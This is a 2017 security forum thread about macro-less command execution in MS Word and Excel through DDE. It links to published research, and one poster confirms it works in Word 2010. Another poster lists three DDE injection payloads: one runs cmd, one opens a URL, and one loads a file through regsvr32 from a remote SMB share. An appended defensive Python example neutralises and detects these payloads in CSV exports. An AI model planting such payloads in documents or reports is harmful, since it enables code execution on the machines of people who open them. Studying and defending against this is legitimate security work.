WarLord Posted October 10, 2017

What if we told you that there is a way to get command execution in MS Word without any macros or memory corruption?! Windows provides several methods for transferring data between applications. One method is to use the Dynamic Data Exchange (DDE) protocol. The DDE protocol is a set of messages and guidelines. It sends messages between applications that share data and uses shared memory to exchange data between applications. Applications can use the DDE protocol for one-time data transfers and for continuous exchanges in which applications send updates to one another as new data becomes available. In our context DDE works by executing an application that will provide the data (the data provider). In a previous post [1] we discussed using DDE in MS Excel to gain command execution, and we have had great success in using this technique to bypass macro-filtering mail gateways and corporate VBA policies. DDE isn't limited to Excel; Word has had DDE capabilities all this time. This has been mentioned by others [2] as a possible avenue, but to our knowledge no one has actually demonstrated this to work.

https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

I tried it in Word 2010, and it works.
SirGod Posted October 10, 2017

Yes, interesting, but the exploitation methods (classic and DDE-based) are already known from exploiting CSV injection (https://www.contextis.com/blog/comma-separated-vulnerabilities). Good to know that it also works in Word; a pity that in this case, too, two alerts appear.
theeternalwanderer Posted October 10, 2017

Another recent article on the same topic: http://georgemauer.net/2017/10/07/csv-injection.html. There are a few neat things that can be done with DDE:

=cmd|'/C calc'!A0 (the classic example)
=IExplore|WWW_OpenURL!www.mataigrasa.com
=regsvr32|\\<fakeSmbServer>\\mataigrasa!A0

Most often I have run into this in web applications that generate reports in CSV/XLS format, where you have some control over the data that goes into the report.
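The report-export scenario in the post above is where CSV/DDE injection usually lands in practice, so here is an added example (editor's code, not from any poster or from the linked articles) of the defensive side: a naive CSV export beside a hardened one that neutralizes formula-triggering cells, plus a detector for the =app|topic!item DDE shape of the three payloads listed. The sample rows and the user/comment column names are constructed for the demo; the neutralization rule (prefix a single quote to any string cell starting with =, +, -, @, tab or CR) follows the usual OWASP CSV-injection guidance rather than anything stated in the thread.

```python
import csv
import io
import re

# Leading characters that make a spreadsheet evaluate a CSV cell as a formula
# when the file is opened. Every DDE payload in the post above starts with '='.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Shape of a DDE invocation inside a formula:  =application|topic!item
# e.g.  =cmd|'/C calc'!A0   =IExplore|WWW_OpenURL!host   =regsvr32|\\host\share!A0
# The application name is taken up to the first '|'; anything may follow the
# '!' as long as an item name is present.
DDE_PATTERN = re.compile(r"""^\s*=\s*[A-Za-z0-9_.\\:'"]+\s*\|.*!\s*\S""", re.S)

# Constructed sample report data: two benign rows, two with DDE payloads.
SAMPLE_ROWS = [
    ["user", "comment"],
    ["alice", "hello"],
    ["mallory", "=cmd|'/C calc'!A0"],
    ["eve", "=IExplore|WWW_OpenURL!www.mataigrasa.com"],
]


def is_dde_payload(value: str) -> bool:
    """True if the cell text has the =app|topic!item DDE shape."""
    return bool(DDE_PATTERN.match(value))


def neutralize_cell(value) -> str:
    """Render a cell so a spreadsheet will not evaluate it.

    Only string values are touched: a numeric -5 stays "-5", but the string
    "-5" (which could be user input) becomes "'-5" and is shown as text.
    """
    if isinstance(value, str) and value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return str(value)


def _write_rows(rows) -> str:
    buf = io.StringIO()
    # csv.writer handles commas/quotes/newlines, but it does NOT know that a
    # leading '=' is dangerous; that is the gap neutralize_cell() closes.
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerows(rows)
    return buf.getvalue()


def export_unsafe(rows) -> str:
    """The vulnerable export: user data is written straight into the CSV."""
    return _write_rows(rows)


def export_safe(rows) -> str:
    """The hardened export: every cell passes through neutralize_cell()."""
    return _write_rows([[neutralize_cell(c) for c in row] for row in rows])


def find_dde_cells(csv_text: str):
    """Scan CSV text and return (row_index, col_index, value) for DDE cells."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_dde_payload(cell):
                hits.append((r, c, cell))
    return hits


if __name__ == "__main__":
    unsafe = export_unsafe(SAMPLE_ROWS)
    safe = export_safe(SAMPLE_ROWS)
    print("--- unsafe export ---\n" + unsafe)
    print("--- safe export ---\n" + safe)
    print("DDE cells in unsafe export:", find_dde_cells(unsafe))
    print("DDE cells in safe export:  ", find_dde_cells(safe))
```

Two caveats a practitioner should keep in mind: the leading apostrophe is visible in the cell after import (the price of not being interpreted), and the detector only recognizes the =app|topic!item shape, so it is a useful alert on exports and uploads but not a substitute for neutralizing every formula-triggering cell on output.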